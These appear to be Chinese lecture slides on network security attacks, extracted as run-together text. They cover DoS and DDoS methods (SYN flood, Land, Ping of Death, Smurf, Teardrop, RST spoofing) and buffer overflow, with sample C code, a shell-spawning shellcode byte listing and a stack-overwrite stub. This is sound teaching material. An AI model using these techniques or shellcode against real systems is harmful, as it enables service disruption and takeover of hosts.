S07-网络安全攻击

凌力lingli●缺陷攻击方法拒绝服务攻击缓存溢出攻击●注入攻击方法●劫持攻击方法网络安全攻击372lingli●DenialofService，DoS使系统或网络过载，使之无法继续提供正常服务的安全攻击特点：•利用协议的特点或系统的漏洞•攻击者不必事先获得对系统的控制权，也不是为了获取访问权类型：•带宽损耗型（bandwidthconsumption）–因大量占用系统（例如一个网站）的网络带宽，导致受害者系统无法向其客户提供正常服务•资源匮乏型（resourcestarvation）–使目标服务器因宕机或没有足够资源（如内存）而失去网络服务能力（无法正常建立连接、响应请求、传输数据等）网络安全攻击337lingli●DistributedDoS，DDoSDoS攻击是攻击者系统与受害者系统拼资源、拼性能的过程，攻击者如果没有足够带宽和计算能力，就无法耗尽攻击对象的系统资源，DDoS攻击可在同一时间调用大量不同位置的计算机向同一目标实施攻击网络安全攻击437lingli●DDoS三种技术类型：（1）利用协议漏洞•SynFlood•Smurf•FakeIP（2）利用软件缺陷•TearDrop•Ping-of-Death•Land•ICMPFragment（3）进行资源比拼•ICMPFlood•UDPFlood•E-mailBomb网络安全攻击537lingli●同步洪水攻击也称为TCP同步攻击、三次握手攻击、半连接攻击技术原理：•基于TCP建立连接所用的三次握手机制，故意缺少第三步的ACK回复，使被叫方计算机的连接一直处于占用资源的等待状态，直到计时器超时释放，如果同时存在大量的半连接，计算机就会耗尽系统资源，无法为正常业务提供服务网络安全攻击637改进：①使用不同IP地址，使接收方难以甄别不正常流量②大量的SYN几乎同时从傀儡机群发出，在连接等待计时器超时前突破系统资源上限lingli●登陆攻击对SynFlood攻击的改进技术原理：•把SYN报文的源和目的IP地址均设置为被攻击者的IP地址，使之向自己回复SYN-ACK和ACK报文，可能由此建立起自环的空连接，占用更长时间和更多资源网络安全攻击737SYN(IP1→IP1)SYN(IP1→IP1)SYN-ACK(IP1→IP1)SYN-ACK(IP1→IP1)SYN-ACK(IP1→IP1)ACK(IP1→IP1)IP1ACK(IP1→IP1)ACK(IP1→IP1)lingli●死亡回显攻击利用ICMP服务端协议机实现的缺陷实施DoS攻击技术原理：•假定某操作系统规定ICMP报文最大尺寸不超过64KB，却不进行严格检查，攻击者故意发送超过64KB上限的畸形ping报文（基于ICMP回显功能），主机就会出现性质严重的内存分配错误，导致崩溃、死机•向目标主机长时间、连续性、大批量地发送ICMP报文，将形成ICMP风暴，使主机耗费大量的计算资源，疲于奔命网络安全攻击837lingli●Smurf回显攻击死亡回显攻击的一种变化技术原理：•向一个拥有大量主机的内部子网发送欺骗性ping报文，目的IP地址设为该子网广播地址，而源IP地址设为子网内被攻击主机的地址•早期版本的某些型号路由器接收到该ICMP报文后予以转发•所有主机收到报文后进行echo，结果目标主机将同时收到大量ICMP报文•反复使用Smurf攻击，可能使子网因广播风暴而瘫痪网络安全攻击937Fraggle攻击与Smurf类似，使用UDP的echolingli●UDP洪水攻击死亡回显攻击的变化之一技术原理：•攻击者随机地向被攻击系统的端口发送UDP数据报文•当目标系统接收到一个UDP数据报文，会根据目的端口号试图确定正在等待（侦听）中的应用程序，如果发现应用程序并不存在，就根据报文中源IP地址回复一个ICMP报文，报告“目的地址无法连接”•如果向目标主机的随机端口不断发送随机端口号的UDP报文，在忙于处理这些垃圾数据报文的过程中，主机性能不断下降，直到不能提供正常服务网络安全攻击1037lingli网络安全攻击1137UDP的chargen和echo服务：•chargen服务用于测试目的（charactergenerator），端口号19，可对任何接收到的UDP报文反馈随机生成的字符•echo服务端口号为7，可对任何接收到的数据原样原路返回lingli●泪滴攻击利用某些TCP/IP实现中分段重组的进程的潜在弱点实施的DoS攻击，属于利用协议机缺陷进行的畸形消息攻击技术技术原理•在TCP/IP协议栈实现中，总是假定可以信任IP报文的控制头所包含的信息•某些TCP/IP协议机（存在于一些操作系统相关版本中）一旦收到含有重叠偏移量的分段数据，会无法处理而崩溃•攻击者据此篡改或恶意设计IP报头，形成错误偏移量指针（offset值错位），发送给目标主机，引起主机宕机而终止服务网络安全攻击1237lingli●电子邮件炸弹攻击主要针对电子邮件服务器系统实施的DoS攻击技术原理：•在同一时间内调用大量电子邮件服务器对同一个目标发送巨量电子邮件，使得该电子邮件服务器无法正常对外服务，或因超出其处理能力而崩溃网络安全攻击1337lingli●IP欺骗攻击利用虚假IP报文（如伪造IP地址或其他字段、伪造IP承载的TCP/UDP报文）实施的DoS攻击，也是其他攻击方法的组成部分之一技术原理：•利用TCP的RST位来实现•假定有一个合法用户（IP地址为A）已经同服务器建立了正常的连接，攻击者构造TCP报文，把IP源地址设定为A，向服务器发送一个带有RST置位的TCP报文，使服务器误解而释放已有连接，合法用户发送数据就因服务器失去连接而无法成功，不得不重新建立连接•为提升攻击效果，端口号应设置为服务器的重点应用，例如Web服务器的80端口•攻击者可伪造大量的IP地址（例如该网段的所有主机地址），向目标主机发送TCP（RST置位）报文，使服务器无法对合法用户进行正常服务网络安全攻击1437lingli●BufferOverflow故意使核心代码的缓冲区发生溢出，进而接管操作系统的root控制权限（如莫里斯蠕虫）缓冲区溢出错误是一种非常普遍、非常隐蔽，也非常危险的漏洞，程序代码不能完全（直接）反映缓冲区溢出错误，在各种操作系统、应用软件中广泛存在如今大约80%的安全事件与溢出攻击有关基本技术原理：•在软件技术上，如果对缓冲区的边界控制不严格，甚至不加以控制，一旦越界，会使数据覆盖其他数据区域，引起不可预料的错误–数据出错–运行代码被破坏–栈内寄存器被破坏–形参和实参被破坏–栈内返回地址错误网络安全攻击1537lingli网络安全攻击1637voidfunc(arg1,arg2,…,argn){local-var1;local-var2;……local-vark;;program……}lingli网络安全攻击1737voidcopy8(char*str){charbuf[8];strcpy(buf,str);printf(“%sn”,buf);}main(){copy8(“dangrous”);}main(){copy8(“safe-string”);}……“safe-string”返回地址ReturnAddrEBPbuf[8]=‘safe-str’EBPESP进栈ing例：存在安全漏洞的系统函数strcpy()lingli网络安全攻击1837C源程序：x打印输出是什么？voidmain(){intx;x=0;pass(1,2,3);x=1;printf(%d,x);}intpass(inta,intb,intc){charbuffer[16];intsum;int*ret;ret=buffer+20;(*ret)+=10;sum=a+b+c;returnsum;}lingli网络安全攻击1937C源程序：voidmain(){intx;x=0;pass(1,2,3);x=1;printf(%d,x);}intpass(inta,intb,intc){charbuffer[16];intsum;int*ret;ret=buffer+20;(*ret)+=10;sum=a+b+c;returnsum;}汇编被跳过的指令被跳过的指令lingli网络安全攻击2037具有低权限的用户执行程序恢复原有权限可能的方法一：在程序执行的过程中，把目标程序“植入”高权限区域，再跳转到目标程序并执行。可能的方法二：在操作系统未恢复用户权限时，改变正常运行过程，跳转到目标程序并执行。获取高级用户甚至超级用户权限从而完全控制目标主机正常流程Trick：程序调用的“库函数”即系统函数通常具有系统最高权限。lingli网络安全攻击2137OS用户shell用户shell•命令控制台•可层次嵌套•继承前一层权限lingli●准备网络安全攻击2237#includeunistd.hvoidmain(){char*name[2];name[0]=/bin/sh;name[1]=NULL;execve(name[0],name,NULL);exit(0);}0x80482c7main+03:jmp0x80482e8main+360x80482c9main+05:pop%esi0x80482camain+06:mov%esi,0x8(%esi)0x80482cdmain+09:xor%eax,%eax0x80482cfmain+11:mov%al,0x7(%esi)0x80482d2main+14:mov%eax,0xc(%esi)0x80482d5main+17:mov$0xb,%al0x80482d7main+19:mov%esi,%ebx0x80482d9main+21:lea0x8(%esi),%ecx0x80482dcmain+24:lea0xc(%esi),%edx0x80482dfmain+27:int$0x800x80482e1main+29:xor%ebx,%ebx0x80482e3main+31:mov%ebx,%eax0x80482e5main+33:inc%eax0x80482e6main+34:int$0x800x80482e8main+36:call0x80482c9main+50x80482edmain+41:.string“/bin/sh”charshellcode[]=0x80482c7main+03:0xeb0x2f0x5e0x890x760x080x310xc00x80482cfmain+11:0x880x460x070x890x460x0c0xb00x0b0x80482d7main+19:0x890xf30x8d0x4e0x080x8d0x560x0c0x80482dfmain+27:0xcd0x800x310xdb0x890xd80x400xcd0x80482e7main+35:0x800xe80xdc0xff0xff0xff‘/’’b’0x80482ffmain+43:’i’’n’’/’’s’’h’（该程序功能为执行name指定的命令行命令；本例为打开新的shell）lingli●代码网络安全攻击2337charshellcode[48]=…（数据略）charlarge_string[32];longend_here=0;voidoverflow(){charbuffer[64];long*long_ptr=(long*)large_string;inti;/*将buffer的地址充满large_string*/for(i=0;i8;i++)*(long_ptr+i)=buffer;/*从shellcode开始拷贝到buffer*/strcpy(buffer,shellcode);}large_string32-byteend_here0…………………………………………0x890